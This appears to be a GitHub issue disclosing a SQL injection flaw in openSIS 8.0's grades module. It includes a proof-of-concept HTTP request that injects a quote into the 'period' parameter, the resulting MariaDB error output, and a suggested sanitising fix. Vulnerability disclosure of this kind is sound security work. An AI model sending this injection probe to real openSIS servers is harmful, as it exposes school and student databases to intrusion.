You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter.
[…]
SQL:
SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=2'6
Traceback:
/var/www/opensis/modules/grades/InputFinalGrades.php at 55
Additional Information:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''6' at line 1
[…]
SOLUTION:
Use function sqlSecurityFilter() before assign $_REQUEST['period'] into query "SELECT".
$period = sqlSecurityFilter($_REQUEST['period']);
The text was updated successfully, but these errors were encountered:
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter.
POC:
REQUEST:
GET /Modules.php?modname=users/TeacherPrograms.php?include=grades/InputFinalGrades.php&include_inactive=&modfunc=gradebook&mp=21&use_percents=true&period=2'6 HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1
RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8
[…]
SQL:
SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=2'6
Traceback:
/var/www/opensis/modules/grades/InputFinalGrades.php at 55
Additional Information:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''6' at line 1
[…]
SOLUTION:
Use function sqlSecurityFilter() before assign $_REQUEST['period'] into query "SELECT".
$period = sqlSecurityFilter($_REQUEST['period']);
The text was updated successfully, but these errors were encountered: